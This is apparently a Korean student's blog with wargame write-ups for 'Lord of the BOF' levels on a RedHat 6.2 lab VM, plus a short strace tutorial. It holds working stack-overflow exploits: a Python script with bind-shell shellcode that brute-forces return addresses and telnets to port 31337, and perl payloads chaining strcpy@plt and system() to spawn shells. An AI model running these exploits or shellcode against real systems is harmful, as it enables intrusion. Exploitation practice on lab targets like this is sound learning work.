                        close(client_fd);

                        break;

                }

여기를 보면 52바이트, 6바이트를 보낸 후 256 바이트를 받는 것을 볼 수 있습니다.

버퍼는 40바이트니, 여기서 버퍼오버플로우가 일어나게 됩니다.


처음에 노가다 했던 코드는 이거인데요,

#!usr/bin/python


from socket import *

import struct, sys


#s = socket(AF_INET, SOCK_STREAM)

payload='\x90'*44 #space


#96 bytes of shellcode

shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"


p = lambda x : struct.pack("<I", x)


#payload= nop 44 ret_addr 4 nop 110 shellcode 96

#s.connect(("192.168.10.129",6666))


print "Connecting.."


for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode


        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)


s.close()


p = lambda x : struct.pack("<I", x) 이부분이 주소값을 리틀엔디안 형식으로 바꿔줍니다.

그냥 페이로드처럼 짰습니다. nop44개, 리턴어드레스, nop 110개, 그리고 쉘코드.

밑의 for address in range는 이제와서 찾아보니 문제 코드에 있는 dumpcode를 활용해 주소를 알아낼 수 있는 방법이 있는 듯하지만 주소값을 얻을 방법이 없는것 같아 막막해서 그냥 주소를 브루트포싱해버렸습니다..

그리고서 페이로드를 보내는 형식이었습니다.

하지만 실행시키면

Death Knight : Not even death can save you from me!


You : 

만 무수히 뜰 뿐, 쉘을 얻을 수가 없었는데, 바인드 한 포트로 접속해야한다는것을 깨달은 뒤 소스를 바꿨습니다.

Administratorui-MacBook-Pro-2:~ EverTokki$ vi exploit_lob.py 


#!usr/bin/python


from socket import *

import struct, sys

import os


#s = socket(AF_INET, SOCK_STREAM)


payload='\x90'*44 #space


#96 bytes of shellcode


shellcode="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"


p = lambda x : struct.pack("<I", x)


#payload= nop 44 ret_addr 4 nop 112 shellcode 96

#s.connect(("192.168.10.129",6666))


print "Connecting.."


for address in range (0xbffff000, 0xbfffffff):

        payload+=p(address)

        payload+='\x90'*110

        payload+=shellcode


        s = socket(AF_INET, SOCK_STREAM)

        s.connect(("192.168.10.129",6666))

        print s.recv(52)

        print s.recv(6)

        s.send(payload)


        os.system("telnet 192.168.10.129 31337")

#s.close()


#close connection


그리고서 신기했던건 바로 쉘이 떴다는 것이었습니다. 그리고 그냥 입력은 안되고 command;형식으로 쳐야 전달이 된다는것도요.

Administratorui-MacBook-Pro-2:~ EverTokki$ python exploit_lob.py 

Connecting..

Death Knight : Not even death can save you from me!


You : 

Trying 192.168.10.129...

Connected to 192.168.10.129.

Escape character is '^]'.

ls

: command not found

ls;

bin

boot

dev

etc

home

lib

lost+found

mnt

opt

proc

root

sbin

tmp

usr

var

my-pass;

euid = 520


exit하니 계속 브루트포싱이 돌아가더라고요ㅋㅋ

그 후로 다시 시도해보니 안되디다???

??

???진짜 안되네요 뭐 잘못 건드렸나?

암튼 푸는거 진짜 재밌게 했음..


login: death_knight

Password:

[death_knight@localhost death_knight]$ ls

dropped_item.txt

[death_knight@localhost death_knight]$ cat dropped_item.txt


 You're so great! This is a token to the next gate.


                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,'

                   `'


[death_knight@localhost death_knight]$


RedHat 6.2 여정 끗.

내일 시험있는데 이거하고나니 새벽한시네요. 클났다.

'~ 2015 > Lord of the BOF' 카테고리의 다른 글

xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
Key File  (0) 2014.05.16
Posted by 에버토끼
여러분 잠깐만, 이 단계 이상해요.

cat로 stdin에 전달하는것은 우선 맞고, 그러고서 팝렛형께 strace쓰라고 힌트도 듣고 감도 잡아서 공격을 하는데 심지어 세그멘테이션 폴트도 안뜨더라고여. 음 뷴명히 48바이트를 넣었는데. 그리고 또 이상한건 그래서 쉘코드가 문제인가? 하고 풀이에 있는 쉘코드를 사용해보았습니다. (Sanguine형 쉘코드를 잠시 썼습니다) 로그를 봐봐요.


[nightmare@localhost nightmare]$ bash2

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28,"\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3","\x01\x50\x01\x40"';cat)|./xavius


¸ù¿@P1P¸@PP@




















ㅁㄴㅇ

/bin/sh: ㅁㄴㅇ: command not found

ㄹmy-pass

/bin/sh: ㄹmy-pass: command not found

my-pass

euid = 519

throw me away

q

/bin/sh: q: command not found

exit

exit


엔터를 치다보니 저렇게 되디다..? 그러고서 조금이따 다시 해보니까


[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath


¸ù¿@P1P¸@PP@



[nightmare@localhost nightmare]$

??



..라고 글을 쓰는 도중, 깨닫게 되었습니다..

"' ; cat)의 차이와 "';cat)의 차이를..

하....

아니 근데 그게 문제가 아닌거 같은데요 뭔가 포맷문제긴 하지만 띄어쓰기 문제인지는 모르겠슴다..?

근데 다른 쉘코드로는 안되네요. 왜그러지. 혹시 2f가 파이프로 전달되면 안들어가나요?

여튼 풀려서 좋네여! 처음봤을땐 매우 막막했는데 풀림


로그(편집안함)


'~ 2015 > Lord of the BOF' 카테고리의 다른 글

xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
Key File  (0) 2014.05.16
Posted by 에버토끼

http://www.linuxintro.org/wiki/Strace 를 참고하겠습니다!


저는 지금 이 글을 쓰는 지금 strace를 전혀 쓸줄 모름니다. strace <file>로 실행시킬 수 있다는거밖에 모름.

자 그렇다면 같이 해봅시다. 헬로월드 프로그램을 짜서 분석해보죠

[nightmare@localhost nightmare]$ cat hello.c

#include<stdio.h>

int main()

{

printf ("Hello, World!\n");

return 0;

}


컴파일하고 strace ./파일명 으로 우선 결과물을 출력해줍시다.


[nightmare@localhost nightmare]$ strace ./hello

execve("./hello", ["./hello"], [/* 22 vars */]) = 0

brk(0)                                  = 0x8049548

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY)      = 3

fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

close(3)                                = 0

open("/lib/libc.so.6", O_RDONLY)        = 3

fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

mprotect(0x40105000, 30812, PROT_NONE)  = 0

old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

close(3)                                = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

munmap(0x40015000, 12210)               = 0

personality(PER_LINUX)                  = 0

getpid()                                = 1120

fstat64(0x1, 0xbffff364)                = -1 ENOSYS (Function not implemented)

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

write(1, "Hello, World!\n", 14Hello, World!

)         = 14

munmap(0x40015000, 4096)                = 0

_exit(0)                                = ?


"To analyze strace's output you must know that the first keyword in a line of output from strace is always a syscall like open or read. Then, in parantheses, the arguments follow, then the result. "

우선 strace의 출력의 첫 키워드는 시스템콜이고, 괄호안에는 전달되는 인자라네여. 그리고 뒤에 결과가 따른다고 합니다. 아마 뒤에 = 한게 결과겠죠?

ㅋㅋ맞다고 써있네요.


"Every line follows the syntax

syscall(arguments) = return value

친절하게 시스템콜이 어떤 동작을 하는지 모르겠다면 man 2 <systemcall>이렇게 찾아보라고도 하네요.

어.. 근데 생각해보니 이게 다네요?

헐?

끗.


analysis

근데 old_mmap랑 mmap 랑 munmap 랑 같은거 같은데 뭘 하는지는 잘 감이 잡히지 않네요. 근데 왜 그동안 strace..이걸 안쓰려고 했나 모르겠ㅅ브니다. 역시 하고봐야 되는듯. 그동안 무서워서 못건드렸거든옄ㅋㅋㅋㅋㅋㅋㅋㅋ 이런..


++) mmap는 근데 메모리에 어떤 장치가 사용할 메모리를 할당해주는 것인 것 같은데, 그렇다면 각각 함수, 즉 open 이나 read, write같은 함수가 사용하는 공간을 만들어주는 것인가요? 위에 strace를 보면 각각 함수들 실행시키기 전에 하나씩 있는걸 보니..

'~ 2015 > 컴퓨터공부' 카테고리의 다른 글

Bufferoverflow 기법 정리  (0) 2015.09.22
핸드레이  (0) 2015.09.05
strace, 제가 한번 사용해 보겠습니다.  (0) 2014.07.22
Buffer Overflow  (3) 2014.05.18
Frame Pointer Overwrite/One Byte Overflow  (5) 2014.04.06
MISCCCCCCCCCC!  (0) 2014.03.11
Posted by 에버토끼

방학이 지옥이여 뭐시여 왜나한테 이런 시련을 주는겨 왜 난 학원숙제를 안하고이쓰까나


[succubus@localhost succubus]$ ls

nightmare  nightmare.c

[succubus@localhost succubus]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>


main(int argc, char *argv[])

{

        char buffer[40];

        char *addr;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // check address

        addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }//버퍼 후 ret가 strcpy여야 합니다 위에 주석의 힌트로 봐선 plt주소값을 사용하란뜻일듯여


        // overflow!

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // dangerous waterfall

        memset(buffer+40+8, 'A', 4);

}

[succubus@localhost succubus]$ cp nightmare fightmare

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p strcpy

$1 = {char *(char *, char *)} 0x400767b0 <strcpy>

(gdb) disas main

Dump of assembler code for function main:

0x80486b4 <main>:       push   %ebp

0x80486b5 <main+1>:     mov    %esp,%ebp

0x80486b7 <main+3>:     sub    $0x2c,%esp

0x80486ba <main+6>:     cmpl   $0x1,0x8(%ebp)

0x80486be <main+10>:    jg     0x80486d7 <main+35>

0x80486c0 <main+12>:    push   $0x80487db

0x80486c5 <main+17>:    call   0x80483e0 <printf>

0x80486ca <main+22>:    add    $0x4,%esp

0x80486cd <main+25>:    push   $0x0

0x80486cf <main+27>:    call   0x80483f0 <exit>

0x80486d4 <main+32>:    add    $0x4,%esp

0x80486d7 <main+35>:    movl   $0x8048410,0xffffffd4(%ebp)

0x80486de <main+42>:    push   $0x4

0x80486e0 <main+44>:    lea    0xffffffd4(%ebp),%eax

0x80486e3 <main+47>:    push   %eax

0x80486e4 <main+48>:    mov    0xc(%ebp),%eax

0x80486e7 <main+51>:    add    $0x4,%eax

0x80486ea <main+54>:    mov    (%eax),%edx

0x80486ec <main+56>:    add    $0x2c,%edx

0x80486ef <main+59>:    push   %edx

0x80486f0 <main+60>:    call   0x80483c0 <memcmp>

0x80486f5 <main+65>:    add    $0xc,%esp

0x80486f8 <main+68>:    mov    %eax,%eax

0x80486fa <main+70>:    test   %eax,%eax

0x80486fc <main+72>:    je     0x8048715 <main+97>

0x80486fe <main+74>:    push   $0x8048800

0x8048703 <main+79>:    call   0x80483e0 <printf>

0x8048708 <main+84>:    add    $0x4,%esp

0x804870b <main+87>:    push   $0x0

0x804870d <main+89>:    call   0x80483f0 <exit>

0x8048712 <main+94>:    add    $0x4,%esp

0x8048715 <main+97>:    mov    0xc(%ebp),%eax

0x8048718 <main+100>:   add    $0x4,%eax

0x804871b <main+103>:   mov    (%eax),%edx

0x804871d <main+105>:   push   %edx

0x804871e <main+106>:   lea    0xffffffd8(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x8048721 <main+109>:   push   %eax

0x8048722 <main+110>:   call   0x8048410 <strcpy> //걍 @plt안붙어있지만 이거인 쁼이 남여

0x8048727 <main+115>:   add    $0x8,%esp

0x804872a <main+118>:   lea    0xffffffd8(%ebp),%eax

0x804872d <main+121>:   push   %eax

0x804872e <main+122>:   push   $0x8048825

0x8048733 <main+127>:   call   0x80483e0 <printf>

0x8048738 <main+132>:   add    $0x8,%esp

0x804873b <main+135>:   push   $0x4

0x804873d <main+137>:   push   $0x41

0x804873f <main+139>:   lea    0xffffffd8(%ebp),%eax

0x8048742 <main+142>:   lea    0x30(%eax),%edx

0x8048745 <main+145>:   push   %edx

0x8048746 <main+146>:   call   0x8048400 <memset>

0x804874b <main+151>:   add    $0xc,%esp

0x804874e <main+154>:   leave

0x804874f <main+155>:   ret

End of assembler dump.

(gdb) q

The program is running.  Exit anyway? (y or n) y

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`

„//시도해보니 됨. 올ㅋ

/*여기서 고민을 했는데 위의 프로그램은 strcpy실행 후 ret주소가 들어갈 자리를 A로 채워버립니다. 근데 왜 하필 strcpy일까염 쓰라고 그런거겠죠? 인자 리밋도 안하니 결국엔 strcpy를 사용해 ret가 들어갈 곳에 주소를 넣는거라고 생ㅇ각을 하게 됬습니다. 그래서 처음엔 strcpy인자두개 뒤에 시스템 주소와 /bin/sh주소 넣으려고 했는데 안되디다. 그래서 걍 앞에따가 넣었어요.*/

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q fightmare

(gdb) b main

Breakpoint 1 at 0x80486ba

(gdb) r

Starting program: /home/succubus/fightmare


Breakpoint 1, 0x80486ba in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y


/*중간에 뭔 뻘짓을 너무많이해놔서 안가리고 걍 다 지웠습니다....*/


[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`

bash2: export: command not found

[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`

[succubus@localhost succubus]$ ls

core  fightmare  nightmare  nightmare.c

[succubus@localhost succubus]$ vi foo.c

[succubus@localhost succubus]$ gcc foo.c -o foo

foo.c: In function `main':

foo.c:5: warning: assignment makes pointer from integer without a cast

[succubus@localhost succubus]$ ./foo BINSH

0xbffffc7c

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf"  '`

AAAAúú ¿úú ¿@BBBB|ü ¿

Segmentation fault (core dumped)


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb) x/40wx $esp-80

0xbffffa74:     0xbffffb04      0xbffffab8      0x0804874b      0xbffffac0

0xbffffa84:     0x00000041      0x00000004      0x08048410      0x90909090

0xbffffa94:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaa4:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffab4:     0x90909090      0x4000ae60      0x90909090      0x41414141

0xbffffac4:     0xbffffad0      0xbffffadc      0x40058ae0      0x08048441

0xbffffad4:     0x080486b4      0x00000002      0x08048441      0x080486b4

0xbffffae4:     0x00000002      0xbffffb04      0x08048350      0x0804877c

0xbffffaf4:     0x4000ae60      0xbffffafc      0x40013e90      0x00000002

0xbffffb04:     0xbffffc02      0xbffffc0e      0x00000000      0xbffffc57

(gdb) x/wx 0xbffffa90

0xbffffa90:     0x90909090

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿˜ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿˜ú ¿'.


Program terminated with signal 11, Segmentation fault.

#0  0x41410004 in ?? () //잘 안바뀜

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿¬ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x90909090 in ?? ()

(gdb) x/40wx 0xbffffaac

0xbffffaac:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffabc:     0x90909090      0x90909090      0x90909090      0x4000ae60

0xbffffacc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffadc:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffaec:     0x0800ae60      0x080486b4      0x00000002      0xbffffb14

0xbffffafc:     0x08048350      0x0804877c      0x4000ae60      0xbffffb0c

0xbffffb0c:     0x40013e90      0x00000002      0xbffffc0e      0xbffffc1a

0xbffffb1c:     0x00000000      0xbffffc57      0xbffffc6a      0xbffffc78

0xbffffb2c:     0xbffffc90      0xbffffcaf      0xbffffcd1      0xbffffcdf

0xbffffb3c:     0xbffffea2      0xbffffec1      0xbffffedf      0xbffffef4

(gdb) x/40wx 0xbffffaa8

0xbffffaa8:     0xbffffc7c      0x90909090      0x90909090      0x90909090

0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac8:     0x4000ae60      0x90909090      0x90909090      0x90909090

0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae8:     0x90909090      0x0800ae60      0x080486b4      0x00000002

0xbffffaf8:     0xbffffb14      0x08048350      0x0804877c      0x4000ae60

0xbffffb08:     0xbffffb0c      0x40013e90      0x00000002      0xbffffc0e

0xbffffb18:     0xbffffc1a      0x00000000      0xbffffc57      0xbffffc6a

0xbffffb28:     0xbffffc78      0xbffffc90      0xbffffcaf      0xbffffcd1

0xbffffb38:     0xbffffcdf      0xbffffea2      0xbffffec1      0xbffffedf

(gdb) x/40wx 0xbffffaa0

0xbffffaa0:     0x40058ae0      0x42424242      0xbffffc7c      0x90909090

0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffac0:     0x90909090      0x90909090      0x4000ae60      0x90909090

0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffffae0:     0x90909090      0x90909090      0x90909090      0x0800ae60

0xbffffaf0:     0x080486b4      0x00000002      0xbffffb14      0x08048350

0xbffffb00:     0x0804877c      0x4000ae60      0xbffffb0c      0x40013e90

0xbffffb10:     0x00000002      0xbffffc0e      0xbffffc1a      0x00000000

0xbffffb20:     0xbffffc57      0xbffffc6a      0xbffffc78      0xbffffc90

0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2

(gdb) q

[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBB|ü ¿AAAAúú ¿ ú ¿

Segmentation fault (core dumped)

[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()/*뭐가 잘 안됨. 근데 걍 삘이 아 시스템 인자전달이 잘못되서 저게....라는 느낌이었슴다*/

(gdb) q


[succubus@localhost succubus]$ gdb -q -c core

Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.

Program terminated with signal 11, Segmentation fault.

#0  0x42424242 in ?? ()

(gdb) x/s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1" /*foo.c너는 대체 나에게 무슨 주소를 준것이냐..*/

(gdb) x/5s 0xbffffc7c

0xbffffc7c:      "TEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

0xbffffcdf:      "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...


(gdb) x/5s 0xbffffc70

0xbffffc70:      "/bin/sh"

0xbffffc78:      "REMOTEHOST=192.168.10.1"

0xbffffc90:      "HOSTNAME=localhost.localdomain"

0xbffffcaf:      "LESSOPEN=|/usr/bin/lesspipe.sh %s"

0xbffffcd1:      "USER=succubus"

(gdb) q


[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ exit

exit

Segmentation fault (core dumped)

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`

@BBBBpü ¿AAAAúú ¿ ú ¿

bash$ my-pass

euid = 518


굿굿



'~ 2015 > Lord of the BOF' 카테고리의 다른 글

xavius->death_knight  (0) 2014.07.31
nightmare->xavius  (0) 2014.07.22
succubus->nightmare  (0) 2014.07.10
zombie_assassin->succubus  (0) 2014.07.08
assassin->zombie_assassin  (2) 2014.06.26
Key File  (0) 2014.05.16
Posted by 에버토끼